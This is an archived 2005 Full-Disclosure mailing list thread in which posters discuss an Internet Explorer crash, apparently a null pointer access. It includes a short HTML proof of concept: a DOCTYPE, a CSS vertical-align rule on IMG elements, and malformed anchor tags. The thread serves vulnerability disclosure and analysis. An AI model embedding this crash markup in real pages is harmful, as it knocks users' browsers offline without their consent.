lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Tue Nov  1 17:45:04 2005
From: ppetkov at gnucitizen.org (Petko Petkov)
Subject: new IE bug (confirmed on ALL windows)

I believe that this is an illegal operation problem. The IE box model is
a bit messy. The div tag is trying to position vertically every IMG
element in the middle. Probably, IE is trying to calculate the margin or
the padding.

Petko Petkov wrote:

>This is a mini version of IECrash:
><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
>"http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
><STYLE>
>.supp IMG {
>VERTICAL-ALIGN: middle
>}
></STYLE>
><P><A <It>HELLO WORLD!</P>
><DIV class=supp>
><A><IMG>
>
>If you remove the DOCTYPE IE does not crash. I believe that this is some
>sort of parsing vulnerability and directly affects IMG tags.
>
>Peter Ferrie wrote:
>
>  
>
>>>I think I have found by chance this weekend a security bug,while browsing
>>>   
>>>
>>>      
>>>
>>the website news, within iexplorer on all windows versions.
>> 
>>
>>    
>>
>>>I haven't enough knowledge (and don't want) into web browsers security to
>>>   
>>>
>>>      
>>>
>>conduct a full investigation, at least
>>
>>It's a null pointer access, but it's not clear for me, yet, why it occurs.
>>
>>_______________________________________________
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>Hosted and sponsored by Secunia - http://secunia.com/
>>
>> 
>>
>>    
>>
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>
>  
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ